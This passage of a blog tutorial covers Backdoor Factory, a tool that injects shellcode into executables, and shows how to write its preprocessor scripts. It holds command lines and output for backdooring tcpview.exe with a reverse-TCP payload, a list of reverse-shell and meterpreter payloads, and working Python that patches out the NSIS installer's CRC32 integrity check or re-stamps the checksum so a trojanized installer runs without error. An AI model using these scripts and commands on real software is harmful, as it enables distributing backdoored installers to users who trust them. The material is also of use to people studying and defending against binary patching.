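    "a_tag_all.py": SCRIPT_TEMPLATE.format(enabled=True, recheck=True, fmt="ALL", marker="[tagged]"),
    "b_pe_only.py": SCRIPT_TEMPLATE.format(enabled=True, recheck=False, fmt="PE", marker="[pe-only]"),
    "c_disabled.py": SCRIPT_TEMPLATE.format(enabled=False, recheck=False, fmt="ALL", marker="[never]"),
}

class BDFContext:
    """Stand-in for the BDF object handed to each script (attribute names assumed)."""
    def __init__(self, tempfile_path, file_format):
        self.tempfile = tempfile_path
        self.file_format = file_format

def sha256_file(path):
    with open(path, "rb") as f:
        return hashlib.sha256(f.read()).hexdigest()

def import_script(path):
    # Importing runs the script's module-level code: this is the "no safety checks"
    # point from the post, so any allowlist has to be applied before reaching here.
    spec = importlib.util.spec_from_file_location("pp_" + os.path.basename(path)[:-3], path)
    mod = importlib.util.module_from_spec(spec)
    spec.loader.exec_module(mod)
    return mod

def run_preprocessors(script_dir, target, fmt, allowlist=None, support_check=lambda p: True):
    """Chain every enabled script in alphabetical order over one tempfile copy of target.
    allowlist: hypothetical set of SHA-256 digests of scripts allowed to run (BDF has no
    such check). support_check: stand-in for BDF's support check, used when a script
    sets recheck_support. Returns (tempfile_path, [(script_name, outcome), ...])."""
    fd, tmp = tempfile.mkstemp(prefix="bdf_pp_")
    os.close(fd)
    shutil.copyfile(target, tmp)
    bdf = BDFContext(tmp, fmt)
    outcomes = []
    for name in sorted(os.listdir(script_dir)):          # rule: alphabetical order
        if not name.endswith(".py"):
            continue
        path = os.path.join(script_dir, name)
        if allowlist is not None and sha256_file(path) not in allowlist:
            outcomes.append((name, "refused: not on allowlist"))
            continue
        mod = import_script(path)
        if not getattr(mod, "enabled", False) or mod.file_format not in ("ALL", fmt):
            continue                                      # settings: enabled, file_format
        result = mod.preprocessor(bdf).run()
        outcomes.append((name, result))
        if result is False:                               # a script reported failure
            break
        if mod.recheck_support and not support_check(tmp):
            outcomes.append((name, "support check failed"))
            break
    return tmp, outcomes

def demo(fmt="ELF", use_allowlist=False):
    """Write the constructed scripts and a fake target into a scratch directory, run the
    chain, clean up, and return (final tempfile bytes, outcomes)."""
    work = tempfile.mkdtemp(prefix="bdf_demo_")
    script_dir = os.path.join(work, "preprocessor")
    os.mkdir(script_dir)
    for name, src in DEMO_SCRIPTS.items():
        with open(os.path.join(script_dir, name), "w") as f:
            f.write(src)
    target = os.path.join(work, "target.bin")
    head = b"CONSTRUCTED-SAMPLE"       # placeholder bytes, not a real executable
    with open(target, "wb") as f:
        f.write(head)
    allow = {sha256_file(os.path.join(script_dir, "a_tag_all.py"))} if use_allowlist else None
    # support check for the demo: the header the patcher relies on must survive every script
    header_intact = lambda p: open(p, "rb").read(len(head)) == head
    tmp, outcomes = run_preprocessors(script_dir, target, fmt, allow, header_intact)
    with open(tmp, "rb") as f:
        data = f.read()
    os.remove(tmp)
    shutil.rmtree(work)
    return data, outcomes
```

Running <code>demo("PE")</code> shows the chain: the ALL script and the PE-only script both append their markers, the disabled script is skipped, and the returned tempfile is what BDF would go on to patch. <code>demo("PE", use_allowlist=True)</code> shows the extra check at work, refusing the two scripts whose digests are not on the list before they are ever imported; the returned path plays the role of keep_temp, since the caller can inspect the pre-injection file before deleting it.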
<div>
<br /></div>
<div>
<pre>
# REQUIRED
class preprocessor:

    # REQUIRED
    def __init__(self, BDF):

        # REQUIRED
        self.BDF = BDF

        # if you want to return a result set it to True
        # and check for failures
        self.result = True

    # REQUIRED
    def run(self):

        # call your program main here
        self.hello()

        # return a result here, if you want
        return self.result
</pre></div>
<div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal; min-height: 13px;">
<span style="font-variant-ligatures: no-common-ligatures;"></span><br /></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> def hello(self):</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> </span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> </span>try:</div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal; min-height: 13px;">
<span style="font-variant-ligatures: no-common-ligatures;"></span> </div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal; min-height: 13px;">
# add a tab for readability</div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> </span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> print '\t[*] Default Template test complete'</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal; min-height: 13px;">
<span style="font-variant-ligatures: no-common-ligatures;"></span><br /></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> # Of course this doesn't fail</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> except Exception, e:</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> print "Why fail?", str(e)</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> self.result = False</span></div>
</div>
<div>
<span style="font-variant-ligatures: no-common-ligatures;"><br /></span></div>
<br />
<div>
<br /></div>
<div>
As mentioned earlier, you can invoke the preprocessor with the '-p' flag, like so:</div>
<div>
<br /></div>
<br />
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">./backdoor.py -f tcpview.exe -p -q</span></div>
<div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-tab-span" style="white-space: pre;"> </span> Backdoor Factory</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> Author: Joshua Pitts</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> Email: the.midnite.runr[-at ]gmail<d o-t>com</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> Twitter: @midnite_runr</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> IRC: freenode.net #BDFactory</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal; min-height: 13px;">
<span style="font-variant-ligatures: no-common-ligatures;"> </span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> Version: 3.4.0</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal; min-height: 13px;">
<span style="font-variant-ligatures: no-common-ligatures;"> </span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[*] In the backdoor module</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[*] Checking if binary is supported</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[*] Gathering file info</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[*] Reading win32 entry instructions</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[*] Executing preprocessor: template</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[*] Running preprocessor template against ALL formats</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[*] Creating temp file: /var/folders/ks/mqxq74qd1qq9y02lq6rjz4g80000gp/T/tmpqEeYSw</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">==================================================</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-tab-span" style="white-space: pre;"> </span>[*] Default Template test complete</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">==================================================</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">The following WinIntelPE32s are available: (use -s)</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> cave_miner_inline</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> iat_reverse_tcp_inline</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> iat_reverse_tcp_inline_threaded</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> iat_reverse_tcp_stager_threaded</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> iat_user_supplied_shellcode_threaded</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> meterpreter_reverse_https_threaded</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> reverse_shell_tcp_inline</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> reverse_tcp_stager_threaded</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> user_supplied_shellcode_threaded</span></div>
</div>
<div>
<span style="font-variant-ligatures: no-common-ligatures;"><br /></span></div>
<div>
<span style="font-variant-ligatures: no-common-ligatures;"><br /></span></div>
<div>
<span style="font-variant-ligatures: no-common-ligatures;">The '-q' flag silences the ASCII banner.</span></div>
<div>
<span style="font-variant-ligatures: no-common-ligatures;"><br /></span></div>
<br />
<div>
You'll notice that BDF is asking you for a shellcode to use; that's normal. If you only want to see what your preprocessor is doing you do not have to set the entire command string, and with the full string the output is longer, like so:</div>
<div>
<br /></div>
<br />
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">./backdoor.py -f tcpview.exe -s iat_reverse_tcp_inline -P 8080 -H 127.0.0.1 -m automatic -p -q</span></div>
<div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-tab-span" style="white-space: pre;"> </span> Backdoor Factory</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> Author: Joshua Pitts</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> Email: the.midnite.runr[-at ]gmail<d o-t>com</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> Twitter: @midnite_runr</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> IRC: freenode.net #BDFactory</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal; min-height: 13px;">
<span style="font-variant-ligatures: no-common-ligatures;"> </span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"> Version: 3.4.0</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal; min-height: 13px;">
<span style="font-variant-ligatures: no-common-ligatures;"> </span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[*] In the backdoor module</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[*] Checking if binary is supported</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[*] Gathering file info</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[*] Reading win32 entry instructions</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[*] Executing preprocessor: template</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[*] Running preprocessor template against ALL formats</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[*] Creating temp file: /var/folders/ks/mqxq74qd1qq9y02lq6rjz4g80000gp/T/tmpZsJogJ</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">==================================================</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-tab-span" style="white-space: pre;"> </span>[*] Default Template test complete</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">==================================================</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[*] Gathering file info</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[*] Overwriting certificate table pointer</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[*] Loading PE in pefile</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[*] Parsing data directories</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[*] Looking for and setting selected shellcode</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[*] Creating win32 resume execution stub</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[*] Looking for caves that will fit the minimum shellcode length of 87</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[*] All caves lengths: 145, 162, 87</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[*] Attempting PE File Automatic Patching</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[!] Selected: 53: Section Name: .data; Cave begin: 0x45149 End: 0x451ef; Cave Size: 166; Payload Size: 162</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[!] Selected: 45: Section Name: .rdata; Cave begin: 0x3fba0 End: 0x3fc46; Cave Size: 166; Payload Size: 145</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[!] Selected: 39: Section Name: .data; Cave begin: 0x44d5e End: 0x44df3; Cave Size: 149; Payload Size: 87</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[*] Changing flags for section: .rdata</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[*] Changing flags for section: .data</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[*] Patching initial entry instructions</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[*] Creating win32 resume execution stub</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[*] Looking for and setting selected shellcode</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">File tcpview.exe is in the 'backdoored' directory</span></div>
</div>
<div>
<span style="font-variant-ligatures: no-common-ligatures;"><br /></span></div>
<div>
<span style="font-variant-ligatures: no-common-ligatures;">For those that are not familiar with the flags:</span></div>
<div>
<ul>
<li>-P -- Port</li>
<li>-H -- Host</li>
<li>-m -- Mode: automatic, replace, onionduke</li>
<li>-s -- shellcode</li>
<li>-p -- preprocessor</li>
<li>-q -- quiet the ascii banner</li>
<li>-f -- file to patch</li>
</ul>
<div>
To see all options, just do ./backdoor.py -h</div>
<div>
<br /></div>
<div>
OK, we see our template preprocessor is working fine; all it does is print:</div>
<div>
<br /></div>
<div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[*] Executing preprocessor: template</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[*] Running preprocessor template against ALL formats</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">[*] Creating temp file: /var/folders/ks/mqxq74qd1qq9y02lq6rjz4g80000gp/T/tmpZsJogJ</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">==================================================</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-tab-span" style="white-space: pre;"> </span>[*] Default Template test complete</span></div>
<div style="font-family: Menlo; font-size: 11px; line-height: normal;">
<span style="font-variant-ligatures: no-common-ligatures;">==================================================</span></div>
</div>
<div>
<br />
<br />
Now let's go for a more complex example:<br />
<br />
<b>Nullsoft Scriptable Install System (NSIS) v3.0 CRC32 Bypass</b><br />
<br />
NSIS is a Windows installer system, widely used for binaries distributed through SourceForge, that has a self-checking mechanism (a CRC32 over the installer) to ensure integrity before installing. If the binary is modified within the checked ranges you will receive an error like so.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiizFH8PLi_4mkCB4hMJ5HI4FdfXlDmIFCnHLE3gHlHsF4SYyhJzh0c2Sa108HiGjDAeChCbEXmkCjgqjJXicxLMZa0EbTZxus5dyX8ey56RkG_1cGk0FBjCqlRggGq4nL703DkvaSSf5I/s1600/nsis_fail.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="167" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiizFH8PLi_4mkCB4hMJ5HI4FdfXlDmIFCnHLE3gHlHsF4SYyhJzh0c2Sa108HiGjDAeChCbEXmkCjgqjJXicxLMZa0EbTZxus5dyX8ey56RkG_1cGk0FBjCqlRggGq4nL703DkvaSSf5I/s320/nsis_fail.png" width="320" /></a></div>
<br />
<br />
Since there is no cryptography involved (a CRC32 is a checksum, not a signature), it is pretty easy to bypass, and there are two ways to do it. <br />
<br />
1. Find the CRC32 test/cmp and the conditional jump that follows it in the disassembly, and patch the jump out.<br />
2. Or find where the CRC32 value is stored and update it to match the modified file.<br />
<br />
For demoing the preprocessor, I'll just do the first one.<br />
<br />
Here is what the script looks like:<br />
<br />
<pre style="font-family: Menlo; font-size: 11px;">
#!/usr/bin/env python

# settings
# Complete these as you need
#############################################

# ENABLE preprocessor
enabled = True

# If you want the temp file used in the preprocessor saved
# THE NAME is self.tmp_file
keep_temp = False

# check if file is modified beyond patching support
recheck_support = True

# file format that this is for (PE, ELF, MACHO, or ALL)
# if not specified the processor will run against all
file_format = "PE"

#############################################

# add your imports here
import re

# 3B 45 08           cmp eax, [ebp+8]   ; computed CRC32 vs stored CRC32
# 0F 85 9C 00 00 00  jne +0x9c          ; mismatch -> "NSIS Error" path
# Index 4 of the pattern is the 0x85 of the jne opcode (0F 85); 0F 84 is je.
CRC_CHECK_SIG = "\x3B\x45\x08\x0F\x85\x9C\x00\x00\x00"
JNE_OPCODE_OFFSET = 4


class preprocessor:

    # REQUIRED
    def __init__(self, BDF):

        # REQUIRED
        self.BDF = BDF

        # Place holder for whether tested binary is a NSIS binary
        self.nsis_binary = False

    # REQUIRED
    def run(self):
        # call your program main here
        self.nsis30()

    def nsis30(self):
        print '\tNSIS 3.0 CRC32 Check | Patch Out Preprocessor'
        # Work on BDF's temp copy, never on the original file
        with open(self.BDF.tmp_file.name, 'r+b') as self.f:
            self.check_NSIS()
            if self.nsis_binary is True:
                print "\t[*] NSIS 3.0 Binary loaded"
                self.patch_crc32_check()
            else:
                print "\t[*] NSIS 3.0 Binary NOT loaded"

    def check_NSIS(self):
        filecontents = self.f.read()

        # Three quick checks common in NSIS binaries; all three must pass
        checks = (
            'NSIS Error' in filecontents,
            'Installer integrity check has failed.' in filecontents,
            'http://nsis.sf.net/NSIS_Error' in filecontents,
        )
        if all(checks):
            self.nsis_binary = True

    def patch_crc32_check(self):
        # This binary string is fairly unique; escape it so the regex
        # engine treats every byte literally
        p = re.compile(re.escape(CRC_CHECK_SIG))
        self.f.seek(0)
        locations = [m.start() for m in p.finditer(self.f.read())]

        if not locations:
            # NSIS strings are present but the stub differs: do not patch blindly
            print "\t[!] CRC32 check signature not found, leaving binary unpatched"
            return

        if len(locations) > 1:
            # Just to let you know there is more than one match
            print "\t[*] More than one binary match, picking first"
        match_loc = locations[0]

        print "\t[*] Patch location", hex(match_loc)

        # change \x85 to \x84: jne -> je, so a CRC32 mismatch now falls through
        self.f.seek(match_loc + JNE_OPCODE_OFFSET)
        self.f.write("\x84")
</pre>
</div>
</div>
<div>
<br /></div>
<div>
<br />
So what is going on with this script? All I am doing is verifying that the binary is an NSIS binary by checking that three strings exist in it, then flipping one bit in the conditional jump that follows the CRC32 compare, which turns jnz (jump if not zero, opcode 0F 85) into jz (jump if zero, opcode 0F 84). That jump originally lands on the error path whenever the computed CRC32 differs from the stored one; after the flip, a mismatch falls through instead. So when we change the contents of the file the compare result will not be zero, there is no error message during execution, and no program exit.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieV_4_MSao5_cN4oJNtI5br_Ty2YrrASueA50nIxW2VkFS7V1Vo7Cot6TdluHleuXiSq6gAkdgIRNZxHtct3cHAvrfan5MQ7m1nOKaEq1ac8GRI_V-afAFJlPSVykKXFMS4OwX9lb5JHw/s1600/NSIS_patch_location.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="48" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieV_4_MSao5_cN4oJNtI5br_Ty2YrrASueA50nIxW2VkFS7V1Vo7Cot6TdluHleuXiSq6gAkdgIRNZxHtct3cHAvrfan5MQ7m1nOKaEq1ac8GRI_V-afAFJlPSVykKXFMS4OwX9lb5JHw/s320/NSIS_patch_location.png" width="320" /></a></div>
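Here is the same patch-out as a stand-alone, testable script, added here as an example; it is not BDF's code and not taken from the post. It keeps the three-string NSIS check and the cmp/jne signature from the script above, and adds the checks a practitioner would want before trusting it in a run: a no-match path that refuses to patch an unknown stub, an already-patched check so re-running it is harmless, and a re-read after the write. The FakeBDF class is an assumption about the interface and mimics only the BDF.tmp_file handle the preprocessor opens; the code uses Python 3 bytes, while BDF 3.4.0 itself ran under Python 2; and the sample blob is constructed, not a real installer.<br />

```python
# Added example, not Backdoor Factory's own code. Assumptions: a preprocessor
# only needs BDF.tmp_file (an open temp copy of the target), which FakeBDF
# mimics; Python 3 bytes are used, whereas BDF 3.4.0 ran under Python 2.
import re
import tempfile

# 3B 45 08           cmp eax, [ebp+8]   ; computed CRC32 vs stored CRC32
# 0F 85 9C 00 00 00  jne +0x9c          ; mismatch -> "NSIS Error" path
NSIS30_CRC_SIG = b"\x3B\x45\x08\x0F\x85\x9C\x00\x00\x00"
JNE_OPCODE_OFFSET = 4   # the 0x85 of "0F 85" (jne); "0F 84" is je
PATCHED_SIG = (NSIS30_CRC_SIG[:JNE_OPCODE_OFFSET] + b"\x84"
               + NSIS30_CRC_SIG[JNE_OPCODE_OFFSET + 1:])
NSIS_MARKERS = (
    b"NSIS Error",
    b"Installer integrity check has failed.",
    b"http://nsis.sf.net/NSIS_Error",
)


class FakeBDF:
    """Stand-in (assumption) for the BDF object passed to preprocessor.__init__."""

    def __init__(self, data):
        self.tmp_file = tempfile.NamedTemporaryFile(mode="w+b")
        self.tmp_file.write(data)
        self.tmp_file.flush()

    def contents(self):
        self.tmp_file.seek(0)
        return self.tmp_file.read()

    def close(self):
        self.tmp_file.close()


class preprocessor:
    """Same required interface as BDF's template: __init__(BDF) and run()."""

    def __init__(self, BDF):
        self.BDF = BDF
        self.result = True        # False signals a failure back to the caller
        self.patch_offset = None  # file offset of the cmp/jne signature

    def run(self):
        # Work on BDF's temp copy by name, exactly as the post's script does.
        with open(self.BDF.tmp_file.name, "r+b") as f:
            data = f.read()
            if not all(marker in data for marker in NSIS_MARKERS):
                print("\t[*] Not an NSIS binary, leaving it untouched")
                return self.result
            if PATCHED_SIG in data:
                # Idempotent: a second run must not flip the je back or fail.
                print("\t[*] CRC32 check already patched out")
                self.patch_offset = data.find(PATCHED_SIG)
                return self.result
            hits = [m.start() for m in re.finditer(re.escape(NSIS30_CRC_SIG), data)]
            if not hits:
                # NSIS strings present but a different stub: refuse to guess.
                print("\t[!] NSIS strings found but no 3.0 CRC32 check signature")
                self.result = False
                return self.result
            if len(hits) > 1:
                print("\t[*] %d matches, patching the first" % len(hits))
            off = hits[0] + JNE_OPCODE_OFFSET
            f.seek(off)
            f.write(b"\x84")                     # jne -> je (one bit: 0x85 -> 0x84)
            f.flush()
            f.seek(off)
            self.result = f.read(1) == b"\x84"   # re-read to confirm the write landed
            self.patch_offset = hits[0]
        return self.result


def build_sample(nsis=True, with_sig=True):
    """Constructed input (not a real installer): a fake MZ stub, optionally the
    CRC check signature, then the NSIS marker strings."""
    blob = b"MZ" + b"\x90" * 0x40
    if with_sig:
        blob += NSIS30_CRC_SIG
    blob += b"\x00" * 16
    if nsis:
        blob += b"\x00".join(NSIS_MARKERS) + b"\x00"
    return blob


def run_preprocessor(blob):
    """Drive the preprocessor the way BDF would; returns (result, offset, new bytes)."""
    bdf = FakeBDF(blob)
    pre = preprocessor(bdf)
    result = pre.run()
    out = bdf.contents()
    bdf.close()
    return result, pre.patch_offset, out


if __name__ == "__main__":
    ok, at, patched = run_preprocessor(build_sample())
    print("patched: %s at %s" % (ok, hex(at) if at is not None else None))
```

Run it directly to see template-style output; against a real installer you would feed the file's bytes to FakeBDF, but only the stub version whose code matches the signature will be patched, which is exactly why the no-match path matters.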
<br />
Again, a better approach would be to find the location of the stored CRC32 value and verify that it is actually correct for the file, which properly confirms that you are looking at a CRC-protected NSIS binary, then patch the binary and update the CRC32 to match the modified binary. But I've only written a preprocessor (runs before patching) and not a post-processor yet. :)<br />
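The second option, verify the stored CRC32 and re-stamp it after modifying the file, as an added example that is neither the post's code nor part of BDF. It assumes a constructed layout chosen for the example, not a claim about the real NSIS format: the checksum is a CRC32 of every byte that precedes it, stored little-endian in the last four bytes. For a real installer the stored-CRC offset and the covered range have to be taken from the stub's own check code (the cmp patched above), which this post does not pin down; the verify-first step is what tells you the layout assumption actually holds before you stamp anything.<br />

```python
# Added example, not from the post or BDF. Layout assumption (constructed for
# this example only): CRC32 of all preceding bytes, little-endian, in the
# trailing four bytes of the file.
import struct
import zlib

CRC_LEN = 4


def stored_crc(data):
    """The checksum as recorded in the file (assumed trailing dword)."""
    return struct.unpack("<I", data[-CRC_LEN:])[0]


def computed_crc(data):
    """The checksum the stub would compute over the covered range."""
    return zlib.crc32(data[:-CRC_LEN]) & 0xFFFFFFFF


def crc_is_valid(data):
    """Verify first: only treat the file as CRC-protected in this layout if the
    trailing value really matches, otherwise the layout assumption is wrong."""
    return len(data) > CRC_LEN and stored_crc(data) == computed_crc(data)


def restamp(data, offset, patch):
    """Apply `patch` at `offset` (inside the covered range) and re-stamp the CRC32
    so the stub's check passes on the modified file."""
    if not crc_is_valid(data):
        raise ValueError("trailing CRC32 does not verify; layout assumption does not hold")
    if offset < 0 or offset + len(patch) > len(data) - CRC_LEN:
        raise ValueError("patch would fall outside the covered range or overlap the CRC")
    body = bytearray(data[:-CRC_LEN])
    body[offset:offset + len(patch)] = patch
    return bytes(body) + struct.pack("<I", zlib.crc32(bytes(body)) & 0xFFFFFFFF)


def build_protected(body):
    """Constructed sample: a body with a correct trailing CRC32 appended."""
    return body + struct.pack("<I", zlib.crc32(body) & 0xFFFFFFFF)


if __name__ == "__main__":
    sample = build_protected(b"MZ" + b"\x90" * 32 + b"NSIS Error\x00")
    fixed = restamp(sample, 5, b"\xCC")
    print("stored %08x computed %08x valid %s" % (stored_crc(fixed), computed_crc(fixed), crc_is_valid(fixed)))
```

Note that restamp refuses a file whose checksum does not already verify: patching a byte and then blindly writing a new CRC32 into a location that was never the checksum would corrupt the file without fixing anything.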
<br />
One thing to note is that you should work on the temp file that was created for the preprocessor module, not on the original. Access it with normal file operations via "with open(self.BDF.tmp_file.name, 'r+b') as self.f:" etc...<br />
You can also access the PE header information through self.BDF.flItms; it is a Python dict (flItms is short for File Items) and should be fairly easy to understand for those familiar with PE files. For Mach-O and ELF files the parsed information lives directly in the self.BDF namespace; there is no 'flItms' object, as the ELF/Mach-O formats are fairly easy to manipulate.<br />
<br />
